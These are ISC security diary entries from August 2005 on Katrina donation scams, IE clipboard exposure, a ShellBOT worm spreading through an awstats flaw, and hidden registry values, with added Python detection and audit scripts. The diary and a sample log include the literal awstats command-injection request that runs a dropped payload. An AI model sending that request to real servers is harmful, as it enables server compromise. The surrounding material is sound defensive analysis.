Published: 2005-08-31

Donations for Katrina victims - be careful

We decided to start a new diary today regarding the fake domains soliciting donations for Hurricane Katrina victims.

We updated the previous diary with information on fake e-mails and domains being used to collect donations for Hurricane Katrina, and Brian Krebs has just posted new information about these fake domains as well.

Some that we strongly suspect so far are katrinahelp.com, katrinarelief.com and katrinacleanup.com.

While trying to do our part, we tried to reach the websites' administrators. To our surprise, while talking to the hosting company of one of the sites, an administrator said:

"You'll have to take that up with PayPal; we don't govern that sort of thing... While it is well known for scammers to benefit from disasters, unless it's harming our network or there's solid proof that damage is being done, there's not a whole lot we can do :-/

I can't exactly turn a site off based on an assumption.."

We got information that there are plenty of domains for sale related to the hurricane. A quick look at domain lookup services for the Katrina name can show you some interesting names...

While some are currently being used to harvest usernames and passwords, much more can be done with these fake domains, from collecting money through fake foundations to leading you to install malicious software on your machine.

If you plan to donate, we recommend that you refer to FEMA's site (fema.gov) for a list of reputable agencies, or donate to organizations you trust and have past experience with.


Handler on Duty: Pedro Bueno - pbueno $ isc .sans .org
Published: 2005-08-30

Katrina; MSIE Clipboard; Exchange Security Logs

Fake Hurricane emails

Like after similar events in the past, we do expect scams and viruses to take advantage of this situation. Please be careful with e-mails containing 'hurricane videos' as attachments, or e-mails asking for donations. Refer to fema.gov for a list of reputable agencies, or donate to organizations you trust and have past experience with.

Hurricane Katrina

Our sympathies for those affected by Katrina. This has been one of the worst storms in history, and it looks as if it is actually getting worse. For those who are interested, I would encourage you to

Clipboard Data Exposure

Microsoft's Internet Explorer exposes clipboard data to scripts via the 'clipboardData' object (window.clipboardData.getData("Text")). While there may be many legitimate uses for this function, the fact that any web page can read the clipboard with no security confirmation is very disconcerting. Ever work on your company payroll in Excel? Copy and paste some of that data? Any site you visit afterwards could collect it and abuse it for any purpose. Hopefully Microsoft will update MSIE to at the very minimum prompt you with a security confirmation. Until then, be careful to clear your clipboard before surfing the web if you deal with sensitive data. Note also that in IE's security zone settings (Custom Level, under Scripting) the option "Allow paste operations via script" can be set to Prompt or Disable, which gates script access to clipboardData for that zone.

Exchange Server Security Issue

J.T. Moore sent us a note about the Exchange 2003 install. One interesting side effect is that during the install, the domainprep step grants the "Exchange Enterprise Servers" group the right "Manage auditing and security log" (SeSecurityPrivilege). This permission cannot safely be removed, as doing so will cause the Exchange server to exhibit errors. Should someone find an Exchange server vulnerability, they would be able to cover their tracks by modifying the security logs. Forwarding the Security log to a separate collector limits what an attacker holding this right can hide.
Published: 2005-08-29

Hurricane Katrina; ShellBOT/awstats; Long Registry Value Names

Hurricane Katrina

Our sympathies for those affected by Katrina. By all measures, this has been an incredibly expensive storm, and it's not over yet. We're particularly interested in reports of disaster preparedness and business continuity actions that were taken, especially the ones that worked! Otherwise, stay safe and stay dry.

Understandably, there haven't been very many reports of any kind out of the area yet, but we have heard that there was an Internet2 link that went down between Houston and Atlanta, which is being worked around.

Reader Wes Oden from Jackson, MS wrote in to let us know that he'd been up until 5am preparing their office for the storm, and decided to turn the event into an exercise in remote monitoring after the Governor issued a state of emergency and requested that all residents stay off the roads. "We took non-critical servers down to conserve battery power, and now all we can do is sit and wait for the worst to come and hope the power stays up." We hope so, too.

New ShellBOT spreading via awstats.

We've gotten reports of a new variant of the ShellBOT trojan being spread via the well-known awstats exploit (the configdir command-injection flaw in awstats.pl). The hostile HTTP request is:

GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20qmail;./start;echo%20;echo| HTTP/1.1

This version brings an IRC server and an IRC client along for the ride to implement its command and control channels, as well as an ELF file infector (Linux.RST.b). We're interested in captures of this command and control traffic.
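As an added example (not part of the diary, and not the worm's code), here is a Python script that flags this class of request in web server logs. The flaw it looks for is the configdir command-injection bug in awstats.pl (CVE-2005-0116): the parameter was handed to a Perl open() call, so a value wrapped in '|' characters is executed as a shell pipeline. The sample log lines are constructed; the first one carries the exact request quoted above, and the client addresses and timestamps are made up.

```python
"""Flag awstats.pl configdir command-injection attempts in combined-format web logs.

Added example for this page, not from the diary.  The log lines are constructed;
the first carries the request quoted in the diary.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Metacharacters that never belong in a directory name passed to awstats.pl.
# The vulnerable code handed configdir to Perl's open(), so '|' at either end
# turns the "path" into a command pipeline; ';' chains further commands.
SHELL_META = re.compile(r"[|;`$&<>]")

# Apache combined log: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def query_params(query: str) -> Dict[str, List[str]]:
    """Split a query string on '&' only; ';' is part of the payload, not a separator."""
    params: Dict[str, List[str]] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def awstats_injection(request_line: str) -> Optional[str]:
    """Return the decoded configdir payload if the request looks like the exploit, else None."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line   # 'GET <target> HTTP/1.1'
    url = urlsplit(target)
    if not url.path.lower().endswith("awstats.pl"):
        return None
    for value in query_params(url.query).get("configdir", []):
        if SHELL_META.search(value):
            return value
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """(client ip, injected command text) for each exploit attempt found in the lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        payload = awstats_injection(m.group("req"))
        if payload is not None:
            hits.append((m.group("ip"), payload.strip("|").strip()))
    return hits


# Constructed sample: line 1 is the diary's request, lines 2-4 are benign traffic.
SAMPLE_LOG = [
    '10.0.0.7 - - [29/Aug/2005:03:12:44 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20qmail;./start;echo%20;echo| HTTP/1.1" 200 1834',
    '192.0.2.5 - - [29/Aug/2005:03:13:01 +0000] "GET /cgi-bin/awstats.pl?config=example.org&output=main HTTP/1.1" 200 58213',
    '192.0.2.9 - - [29/Aug/2005:03:14:10 +0000] "GET /cgi-bin/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 58213',
    '198.51.100.4 - - [29/Aug/2005:03:15:33 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, cmd in scan_log(SAMPLE_LOG):
        print(f"{ip}: awstats configdir injection -> {cmd}")
```

Run it against a real access log with `scan_log(open("access_log").read().splitlines())`. The query string is split on '&' only, deliberately: the injected command is full of ';', and a parser that treats ';' as a parameter separator (as older versions of Python's parse_qs did) would hand you only the first fragment of the attacker's command.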

More on the overly long registry value name hiding problem:

An article over at PC-Welt (in German; use Babelfish if necessary) about which products successfully handle long registry value names and which ones are partially blinded by them leads us at the ISC to wonder whether different language versions of Windows 2000 and XP handle long registry value names differently. That could explain some of the difficulty that various testers have had in validating which tools work and which platforms are affected.



Published: 2005-08-28

Hurricane Katrina Preparations; Broken Mytob?

Hurricane Katrina Preparations

Hurricane Katrina is now a Category 5 storm and is forecast to hit the New Orleans area and central US Gulf Coast in the next 24 hours with catastrophic damage. The Internet Storm Center is interested in publishing any anecdotal stories from those in the storm's path that pertain to preparations in advance of the storm. Of course, the priority must be on personal and family safety but if you are in the path of the storm and have time to send us a note please do so. We are interested in posting your thoughts, comments, and observations about what you are doing to prepare your computer networks and systems for the coming destructive storm.

Also, we plan to try a new feature of our diary that will allow us to post photos. So, if you have any digital photos of what you are doing to prepare for the storm and can send them to us, please use the upload form at http://isc.sans.org/contact.php

We'll keep the diary updated as information is submitted to us.

Update - notes from last year

Handler Scott Fendley suggested that we reprint last year's list of hurricane preparation items for anybody in the path of Katrina. Here's the list:

Local IT staff

- Work with local building management to coordinate building shutdowns. Be aware that most buildings will begin shutdown procedures when a Hurricane Warning is issued. (If they say power is going off at 1:00 pm that means power is shutdown at that time not that they are starting to shutdown.) Coordinate with firm wide IT to begin systems shutdown 30 minutes prior to building shutdowns.

- Work with local managers and share any information with Firm wide IT.

- Loaner laptops should be issued to key personnel that do not have laptops.

- Keep a loaner laptop that contains Ghost images for desktops/laptops.

- Ensure you have updated your contact information in the IT Contacts.

Firm wide IT

- Perform a full backup of all systems 4 days prior to the impact of the storm unless already scheduled. Have backups sent off site. (Be aware that UPS, FedEx, etc. will stop shipments prior to the hurricane's impact.)

- Perform incremental backups every night prior to storm and have them sent off site.

- Perform Full backup prior to storm impact if possible. Have local IT retain control.

- Once building power is shutdown redirect the main numbers for the affected offices to an offsite voicemail box. (This eliminates busy signals and you can notify clients of the offices' status.)

- Update Office Closure hotline as the situation changes.

- Update Intranet with Hurricane updates for offices in unaffected regions.

- Prepare alternate procedures for the firm wide helpdesk.

- Get any necessary equipment into or out of the offsite datacenters. (Be aware the datacenter will not allow access 48 hours prior to the storm making landfall in the area, and will not resume until the local authorities have deemed it safe to travel.)

- Wrap critical systems that are located in the affected offices in plastic to help reduce water damage.

We'll take other ideas from readers if you have any. Submit them via our contact page.

Other lists

I hunted around the Internet and found many sites with lists that are useful for anybody in the path of Katrina or the other hurricanes that are expected later this year. There are countless commercial and private lists, so I'm limiting this to just a few of the "official" ones sponsored by various government agencies. Remember the first step of the Six Step Incident Handling Process - PREPARATION. Some of these lists are worth printing and posting on office bulletin boards.







Broken Mytob?

Brian sent us a note that he has received email with an attachment titled "important-details.zip" that he thinks is a broken version of Mytob. If anybody else has seen this or has any analysis to offer please drop us a note via the contact page.

Marcus H. Sachs

SRI International

Handler on Duty


Published: 2005-08-26

More on Registry Concealment; suspected Zotob author arrested

Long Registry Value Name Update

We keep receiving updates about the long registry value name issue. For some products, you may see alerts only if the data associated with a long-named value matches a given signature; an alert may not be generated merely for the presence of a long value name.

Spybot-S&D is able to check values with long names. RegAlyzer 1.1 and Spybot-S&D 1.4 (under the tools -> System Startup section in advanced mode) both do, in fact, see the values with long names and all subsequent values.

Also, note that the Cygwin ls tool mentioned yesterday will show the long value names, but complain about "filename too long".

All Seeing Eye from Fortego has been reported to catch the overly long registry value names properly.

WARNING - Tom Liston's tool for looking for long registry value names WILL PEG YOUR PROCESSOR. Get over it.

Zotob arrests in Turkey and Morocco



"The arrest of the eighteen-year-old hacker occurred upon the request of the FBI, which traced the virus back to a website in Morocco, DGSN said.

According to primary investigation, the hacker had accomplices in Turkey, the motive was financial, and he acted in connivance with groups specialised in bankcards forgery."

The two hackers 'Diabl0' (Farid Essebar) and 'Coder' (Atilla Ekici) are suspected to be responsible for a number of Mytob and Zotob variants.

Published: 2005-08-25

Updated Windows Registry Concealment Info;Symantec AV Vulnerability

Updated Windows Registry Concealment Info

First of all thank you once again to the scores of people who have sent us data, suggestions, code, test results, etc on this issue. We could not provide what we do to the community without this collective worldwide effort.

We have started to see some possible reports of malware which utilizes this concealment technique in the wild. We expect this trend to continue over the next few weeks as vendors patch their products as necessary to make these values visible to their scan engines.

With the help of you all we have been collecting reports of what products/versions deal with this issue well or not at all. If you see any inaccuracies or omissions please let us know.
Please don't take this as product bashing. Everyone we've talked to is interested in handling this issue and getting patches out as necessary. However, we think it's important for users to know if they may have a blind spot in their local system security.

I think the take-home here is that a malware scanning utility (be it anti-virus, anti-spyware, etc.) that can watch over your registry for you is a critical part of keeping safe, and that it will be important for many to watch for product updates in the coming weeks and get them installed (not to mention regular updates, signatures, etc.).

It's important to note that many products have several registry-related functions, and each function does not necessarily handle this issue as well as the others.

Also, version information was not included in all submissions, so if you see a product listed here without a version, it might be a good idea to double check, but don't freak out.
Also, it's important to note that this information is provided in the hope you may find it useful. It doesn't imply an opinion, endorsement, etc. of SANS or the ISC. This list is by no means exhaustive. We're all volunteers just trying to lend a hand, and there are only so many hours in the day to analyze, evaluate, test, etc.

Products that have been reported to be able to query/report/delete/etc these values:

AppSense Environment Manager

HiJackThis v1.99.1 (SCAN function)

HiJackThis v1.99.2

StillSecure Safe Access

Sysinternals Autoruns (mixed reports)

Regedt32 (Win2k)

Spybot S&D

Products that have been reported to be unable to see these values (at least in some versions) or to behave unexpectedly (crash, etc.):


Autoruns 8.13

MS AntiSpyware Beta

HijackThis v1.97.0.7

HiJackThis v1.99.0

HiJackThis v1.99.1* (Generate StartupListLog)

Msconfig (WinXP)

Norton SystemWorks 2003 Pro

RegAlyzer 1.1


reg.exe (under some circumstances)

Registry Explorer

WinDoctor v. 7.00.22

Helpful tools/Tips

Cygwin regtool

(example: regtool list /HKLM/Software/Microsoft/Windows/CurrentVersion/Run)

Cygwin ls

(example: ls -l /proc/registry/HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run)

Perl's Win32::TieRegistry


System Information tool (winmsd.exe)

export registry, make your edits and then re-import

*Special Note: Merjin has been working on this class of issues; keep an eye out for v1.99.2 of HijackThis for full support in dealing with values with long names.

And the best for last. Our own Tom Liston has created, out of the kindness of his heart and his deep concern for all of humanity, a recursive registry scanner which will report on values with names in excess of 254 characters. Enjoy! And please let us know if you start finding all sorts of long entries. It will help us get a handle on the prevalence of this issue, and we'll provide updates here in the diary as we figure out what's going on, so hopefully the world is a little safer place.

FILE: (3584 bytes)






If I leave anyone's name out please forgive me and/or flame me.

A big thanks to:

Aaron, Adam, Alan, Bill, Daniel, Eduardo, Frank, Iain, John, Juanma, Linford, Luis, Merjin, Merrill, Michael, Niels, Randall, Robert (not me, another one), Simon, Tom, and all of the folks on the DShield Forum.

Thought I was kidding didn't you. Thats just folks that have helped us out in the last 24 hours.

You guys rock.

Symantec AV Vulnerability


The Symantec AntiVirus Corporate Edition HTML client help function uses HTML help, the Windows help interface, to provide support to the client user. A non-privileged client user can manipulate the help function to access files on the system with local SYSTEM privileges.

[from Symantec]


Robert Danford

SANS ISC Handler on Duty


Published: 2005-08-24

Nasty Games of Hide and Seek in the Registry; Nepenthes


What started like a nice and quiet day ended with the potential for lots of nasty surprises. A reader alerted us to a vulnerability note published by Secunia (http://secunia.com/advisories/16560/) that on first sight did not appear to be overly scary. Once we started to play with it, though, the nastiness became apparent: a registry value with an overly long name can be added, but won't be shown by regedit or regedt32. Even better, all values that get added afterward under the same key, even if their names are not overly long, will be hidden as well.

[Pause, to give your wheels some time to spin]

Yes. This allows adding hidden entries under the famous HKLM\Software\Microsoft\Windows\CurrentVersion\Run key: entries that you can't see with regedit, but that will just as faithfully get run at startup.


For a little good news, while regedit is completely blind, the command line "reg" utility can see the entries, apparently.

C:\>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

is the command to use. If it shows you start-up entries that you can't see in regedit, you just found a glitch in the Matrix.

Another faithful tool that doesn't lie like regedit is the tried and true "Autoruns" from Sysinternals: http://www.sysinternals.com/utilities/autoruns.html


Once you've found them, getting rid of the offending registry entries isn't too easy, either. What worked for us during the tests was again "Autoruns" from Sysinternals, provided you use the current (8.13) version. Older versions seem to occasionally choke on the long value name. Another approach one of the handlers used successfully was to do a "reg export" on the command line of the entire "Run" key. Then he manually deleted the entire "Run" key from the registry, edited the exported file to remove the offending values, and re-imported the .reg file, thus recreating the "Run" key.

Of course, the usual disclaimer applies when you are monkey-wrenching the registry. You have been warned.
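Here is an added example, written for this page rather than taken from the ISC or from Tom Liston's scanner mentioned in the 08-25 diary, of the same kind of recursive scan in Python. It reports every value whose name exceeds 254 characters (the threshold the diary uses) and, for each affected key, the values enumerated after the first long one, which are the ones regedit hides. The walk logic is separated from registry access: on Windows it reads the live registry through the standard library's winreg module; elsewhere it runs against a constructed in-memory tree that mimics a poisoned Run key. The tree contents, including the 'evil.exe' and 'dropper.exe' paths, are made up for illustration.

```python
"""Recursive scan for registry values with overly long names.

Added example for this page (not the ISC's or Tom Liston's tool).  The walk
logic is backend-independent so it can run against a constructed in-memory
tree as well as the live Windows registry via winreg.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

LONG_NAME = 254  # names longer than this are what the diary's tool reports on


@dataclass
class Finding:
    key: str                                                # key path below the hive
    long_values: List[str] = field(default_factory=list)    # names > LONG_NAME, truncated for display
    hidden_after: List[str] = field(default_factory=list)   # short names enumerated after the first long one


class DictBackend:
    """Registry-shaped dict: {"Sub": {...}, "__values__": [(name, data), ...]}."""

    def __init__(self, tree: Dict):
        self.tree = tree

    def _node(self, path: str) -> Dict:
        node = self.tree
        for part in (path.split("\\") if path else []):
            node = node[part]
        return node

    def subkeys(self, path: str) -> List[str]:
        return [k for k in self._node(path) if k != "__values__"]

    def values(self, path: str) -> List[Tuple[str, object]]:
        return list(self._node(path).get("__values__", []))


class WinRegBackend:
    """Live registry access; only instantiate on Windows (imports winreg lazily)."""

    def __init__(self, hive: int):
        import winreg
        self.winreg, self.hive = winreg, hive

    def subkeys(self, path: str) -> List[str]:
        with self.winreg.OpenKey(self.hive, path) as key:
            count = self.winreg.QueryInfoKey(key)[0]
            return [self.winreg.EnumKey(key, i) for i in range(count)]

    def values(self, path: str) -> List[Tuple[str, object]]:
        with self.winreg.OpenKey(self.hive, path) as key:
            count = self.winreg.QueryInfoKey(key)[1]
            return [self.winreg.EnumValue(key, i)[:2] for i in range(count)]


def scan(backend, path: str = "", limit: int = LONG_NAME) -> List[Finding]:
    """Walk every key below `path`; keys holding at least one long value name are reported.

    Values are examined in enumeration order: once a long name has been seen,
    every later value under the same key is recorded as hidden_after, since
    that is what regedit/regedt32 fail to show.
    """
    try:
        values = backend.values(path)
        subkeys = backend.subkeys(path)
    except OSError:            # access denied etc.: skip this key, keep walking
        return []
    finding = Finding(key=path or "<root>")
    seen_long = False
    for name, _data in values:
        if len(name) > limit:
            seen_long = True
            finding.long_values.append(name[:40] + f"...({len(name)} chars)")
        elif seen_long:
            finding.hidden_after.append(name)
    findings = [finding] if finding.long_values else []
    for sub in subkeys:
        findings.extend(scan(backend, f"{path}\\{sub}" if path else sub, limit))
    return findings


RUN = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
# Constructed tree: one long-named value smuggled into Run, then a short one after it.
SAMPLE_TREE = {"Software": {"Microsoft": {"Windows": {"CurrentVersion": {
    "Run": {"__values__": [
        ("ctfmon.exe", "C:\\WINDOWS\\system32\\ctfmon.exe"),
        ("A" * 300, "C:\\WINDOWS\\system32\\evil.exe"),
        ("Updater", "C:\\WINDOWS\\Temp\\dropper.exe"),
    ]},
    "RunOnce": {"__values__": []},
}}}}}

if __name__ == "__main__":
    import sys
    if sys.platform == "win32":
        import winreg
        targets = [("HKLM", WinRegBackend(winreg.HKEY_LOCAL_MACHINE)),
                   ("HKCU", WinRegBackend(winreg.HKEY_CURRENT_USER))]
    else:
        targets = [("SAMPLE", DictBackend(SAMPLE_TREE))]
    for hive, backend in targets:
        for f in scan(backend):
            print(f"{hive}\\{f.key}: long names {f.long_values}; hidden after them: {f.hidden_after}")
```

The scanner is read-only; it tells you where to look, and removal is still the export/delete/re-import dance above (or a current Autoruns). Walking all of HKLM takes a while and, like the diary's own tool, will keep a CPU busy. For a quick spot check of the usual suspects, pass the Run key directly: `scan(WinRegBackend(winreg.HKEY_LOCAL_MACHINE), RUN)`.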

Let us know!

If you come across a tool that does or doesn't show or remove these hidden values, please let us know. We'll update the diary accordingly.

Update 20:21 UTC: Spybot S&D, AdAware and MS AntiSpyware Beta don't seem to find anything offending with the long value names. "Show Autostarts" of MS AntiSpyware Beta does not list the hidden values (values added after one with a long name). Spybot S&D TeaTimer will intercept these values when they are being added.


Every now and then, news like the above ends up pushing other good stuff out of the diary. Thus, just briefly: if you like "mwcollectd", the automated malware sample collector, chances are you'll like Nepenthes even more. http://nepenthes.sourceforge.net/


Daniel Wesemann

(with lots of research help from the entire handler gang)


Published: 2005-08-23

Windows buffer overflow protection

Today, we solicited ideas for runtime buffer overflow protection on the Windows platform. There have been many recent developments in the arena of buffer overflow protection. Many vendors are coming out with their own solutions for protecting machines from 0-day buffer overflow attacks. Even the anti-virus vendors are bundling it into their AV solutions. Is it the next big thing in security, or is it just more marketing hype?

I have personally seen a couple of products in action recently; both performed as claimed and protected unpatched machines from buffer overflow attacks (different attacks for the two products that I have seen). If you have one installed in your environment, please share your thoughts on how it performed.

Here are some of the vendors/products who have solutions in this space; feel free to contribute more (with a brief description, please):

* McAfee VirusScan Enterprise 8i: this AV solution will protect the Windows machine from buffer overflow attacks.

* Ozone HIPS is a policy-based HIPS that has buffer overflow protection by randomizing the memory address space.

* Prevx is a HIPS that provides buffer overflow protection.

* McAfee Entercept is McAfee's IPS solution.

* Cisco CSA, formerly known as Okena StormWatch, is Cisco's IPS offering.

* Symantec Critical System Protection is Symantec's behavior-based HIPS.

* Win XP SP2 and Win 2K3 SP1 have Data Execution Prevention (DEP) built in. It needs a more recent CPU from Intel or AMD (one with NX/XD support) to provide full protection. See http://support.microsoft.com/kb/875352 [Steve Shockley]

* StackDefender is a Windows IPS [Simon Howard]

* ISS Proventia Desktop Firewall has a buffer overflow protection engine [Matt Pierce]

* eEye Blink has buffer overflow protection and has a reasonable price point. [Seth Kusiak]

* Sygate Secure Enterprise provides buffer overflow protection as well as a whole lot of other endpoint protection features. [Seth Kusiak]

* Determina SecureCore is another host-based IPS product. [Daniel Charboneau]


Another handler, Ed Skoudis, reminded us that there are two forms of DEP: software-based DEP and hardware-based DEP. The software-based kind is active by default on WinXP SP2 regardless of your processor type. It is configured to protect "essential Windows components and services", and other applications can be added. Hardware-based DEP requires a processor that supports NX.

Ed also added that to enable DEP, you have to do the following,

Start-->Settings-->Control Panel-->System-->Advanced.
Click on Settings under Performance, and go to Data Execution Prevention.
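The dialog above toggles the /noexecute switch in boot.ini on XP SP2 and 2003 SP1 (the switch that KB875352 documents, with the values OptIn, OptOut, AlwaysOn and AlwaysOff). As an added example, not from the diary, the Python below audits a boot.ini for that switch so an admin can check the effective policy on many machines without clicking through the dialog. The boot.ini text is constructed; treating a bare /execute switch as DEP-off is my reading of that switch and is marked as an assumption in the code.

```python
"""Audit the DEP policy switch in a Windows XP SP2 / Server 2003 SP1 boot.ini.

Added example for this page; the boot.ini text below is constructed.
"""
import re
from typing import Dict, List

# Meaning of each /noexecute= value (as documented in KB875352).
DEP_POLICIES = {
    "optin": "OptIn: DEP only for Windows system binaries (default on XP SP2)",
    "optout": "OptOut: DEP for all programs except an exclusion list (default on 2003 SP1)",
    "alwayson": "AlwaysOn: DEP for everything, exclusions ignored",
    "alwaysoff": "AlwaysOff: DEP disabled",
}

NOEXECUTE_RE = re.compile(r"/noexecute=(\w+)", re.IGNORECASE)
EXECUTE_RE = re.compile(r"/execute\b", re.IGNORECASE)
ENTRY_RE = re.compile(r'\s*"([^"]*)"(.*)')   # "description" followed by boot switches


def parse_boot_ini(text: str) -> Dict[str, str]:
    """Map each [operating systems] entry description to its DEP policy keyword."""
    section = None
    policies: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "operating systems" or "=" not in line:
            continue
        _arc_path, _, rhs = line.partition("=")   # ARC path = "description" switches
        m = ENTRY_RE.match(rhs)
        if not m:
            continue
        description, switches = m.groups()
        noexec = NOEXECUTE_RE.search(switches)
        if noexec:
            policies[description] = noexec.group(1).lower()
        elif EXECUTE_RE.search(switches):
            policies[description] = "alwaysoff"    # assumption: /execute turns DEP off
        else:
            policies[description] = "unspecified"  # no switch: the OS default applies
    return policies


def describe(policy: str) -> str:
    return DEP_POLICIES.get(policy, "no /noexecute switch present; the OS default applies")


def weak_entries(policies: Dict[str, str]) -> List[str]:
    """Boot entries an auditor should look at: DEP off, or nothing configured explicitly."""
    return [desc for desc, p in policies.items() if p in ("alwaysoff", "unspecified")]


# Constructed boot.ini: a default XP SP2 entry and a second entry with DEP switched off.
SAMPLE_BOOT_INI = """
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS="Windows XP (DEP off)" /noexecute=AlwaysOff /fastdetect
"""

if __name__ == "__main__":
    policies = parse_boot_ini(SAMPLE_BOOT_INI)
    for desc, policy in policies.items():
        print(f"{desc}: {describe(policy)}")
    print("needs attention:", weak_entries(policies))
```

On a real box, feed it `open(r"C:\boot.ini").read()` (the file is hidden and read-only; boot.ini changes take effect at the next reboot, which is why the dialog asks for one). OptIn only covers Windows' own binaries; moving to OptOut is what actually extends DEP to the third-party services worms like Zotob target.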

Scooter had good experience with Mcafee Enterprise VirusScan 8i. "It has worked as advertised with almost no configuration or customization necessary. It so far has been one of the best implementations of buffer-overflow protection I have seen (i.e. quiet but effective)." [Scooter]

Keng Lim sent in an interesting link to information on circumventing MS DEP.

Philippe submitted another link to us for circumventing the MS DEP http://www.packetstormsecurity.com/papers/bypass/bypassing-win-heap-protections.pdf [Philippe]

From reader Casey Rhoton, "This is eEye's IPS solution, and during our evaluation testing, I placed an unpatched Windows 2000 workstation with Blink installed in an out-of-the-box configuration outside our firewall. The machine survived two full weeks outside the firewall with only the Blink client on it. This machine did not have the latest patches, or AV of any kind on it. Very impressive. We had similar results with Cisco's CSA, but the CSA agent desperately wants to talk to its management server, as does McAfee's Entercept product. Both of these products use the Okena core code. The one thing I noticed while testing these products was that eEye's Blink was the only product tested that I did not find any remnants of attack code, or malware on the hard drive after testing. They state that their product stops the attack at the network link, between layers 3 and 4, thus preventing the overflow from ever making it to the physical hard drive. The other products seem to kill the attack at execution. Just my experience with these products. They all have a fairly large memory footprint, some more than others." [Casey Rhoton]

From an anonymous reader, "We have the McAfee Virusscan 8 Buffer Overflow Protection in place on our network. During the recent Zotob outbreak, it worked at first, blocking infection attempts that were coming from our WAN. However, the worm found an unprotected machine on our network, which then found several more unprotected machines. Once there were several infected machines on the LAN, the worm started jumping to protected machines. After analysis, it looks like the machines were somehow overloaded to the point of rebooting (either by network traffic or attempted attacks). As the machines were booting, the anti-virus hadn't started yet, but the Plug and Play service was reachable via TCP port 445. The previously protected machines became infected, after which they ironically started blocking incoming buffer overflow attempts again (albeit too late). Moral of the story - don't depend solely on McAfee Buffer Overflow Protection, because it won't protect you from a network worm while machines are in the process of booting. Perhaps a desktop firewall might help, but I haven't had a chance to test that yet."

JD from VirusIntel.com wrote in and said, "I have implemented VirusScan 8.0i into my organization and it does work well. I think McAfee should adopt Ford's slogan "Have you taken a look at us lately". One thing for readers to keep in mind is that VirusScan 8.0i does not provide protection for all services. I believe readers could search the Knowledge Base for a list of services covered. Another consideration that needs to be acknowledged is that the protection offered is the removal of malicious code as a result of a buffer overflow. While the attacked system will not be infected, the service that the buffer overflow occurred on may be left in an unstable state. In the case of MS04-011, this meant a possible reboot.

I have also implemented McAfee's Entercept (HIPS) into my organization as well. I am very impressed with the product. The signature based protection really compliments the behavioral based protection. Creating custom signatures can be very powerful for protecting against new threats, or for other management functions such as USB storage device blocking.

I have also tested PrevX home edition. If you do not mind the chatty warnings, and remember to suspend it before installing software, then it offers great protection for home users. I recommend it for home users that are, well, let's say, known for risky internet behavior." Thanks, JD!

John Sawyer wrote in to remind us that Mcafee VirusScan only protects about 20 different applications, so it might not provide sufficient coverage.

Cody Hatch suggests that "eEye's Blink is essentially a network layer-based protocol reassembler. If a protocol doesn't fall within Blink's "understood" protocols, will it get handled appropriately? Since Blink doesn't hook into the kernel and relies solely on network-layer information, encrypting application layer data (an attack can conform to RFCs and have an encrypted application layer) will evade Blink as well." [Update: eEye writes back and confirms that, aside from the network traffic examination, Blink does have a kernel driver that monitors various kernel APIs to see how things are behaving and stop attacks. Also, Blink has protection code that gets injected into applications to generically protect against various bad system calls and behaviors. This is consistent with Casey Rhoton's observation that no attack code was left residing on the box: even if an attack passes the network-layer checks, it can still be caught by Blink using the above-mentioned mechanisms.]

Moses Hernandez has the following comments, "From my experience the eEye Product has a network and application firewall and an RFC Based IPS. What this means is that it has taken RFCs and created rules based upon what the RFC denoted parameters are. We did not get hit with Zotob or any other worm in the last 8 months. I know that the company has stated for the Zotob infection that any machine with the Blink client did not necessarily need to be patched right away since the IPS portion should protect the client. Additionally the 2.0 Product includes an Advanced Application Protection Piece. Most badly written software will trigger the Application protection so I've only been able to use this on very specific locked down machines. This will protect any piece of software from running inside Ring 0 (NT Kernel Protected Space). Since most malware and spyware will run inside of this it will protect that. I have no idea if this includes Buffer Overflow attacks but I am sure it must at some level inspect this.

The Cisco CSA Client with the Okena code is a different animal. It does have some features which will allow applications not to run. If the machine is however not configured correctly, then renaming the application will allow said application to run. Additionally it is an anomaly engine. It will need to "learn" what is a "normal" traffic pattern to be able to protect against "abnormal" traffic patterns such as a DoS attack. Finally, about needing to be hooked into the mothership, please note that there are configurations that will allow you to use what they mention as a Headless CSA; it has a default policy. This is used on the Cisco ACS product and also the Cisco CallManager.

Lastly the ZoneLabs Integrity Client, which is an enterprise client of the ZoneLabs Firewall, now has the Checkpoint SmartDefense Filters already applied to it. I cannot comment more than to say that these are the same filters you find on the Interspect Engine and I believe more than what you find on the FW1/VPN1 firewalls. They are signature based and do require updates. The nice thing is that people with organizations that have Checkpoint Products will now have a unified Dashboard, Logging, Tracking and more features than I care to go into." Thanks, Moses


Jason Lam

ISC handler on duty - jason /at/ networksec /dot/ org


Published: 2005-08-22

Port 8008; Quiet Day, Thanks!; Money-Back Guarantee; Follow the Bouncing Malware VII: All That Glitters Is Not Gold

Port 8008

We're seeing a spike in scanning for port 8008 as a result of the kidz looking for machines that are vulnerable to a recently (mid-August) announced remote stack overflow in Novell eDirectory Server. Jus' a heads up: if you haven't patched - PATCH!

Quiet Day, Thank You!

Tap, tap, tap...

Hello? Is this thing on?

In contrast with the craziness of the past week, today was so quiet, you could hear a packet drop.

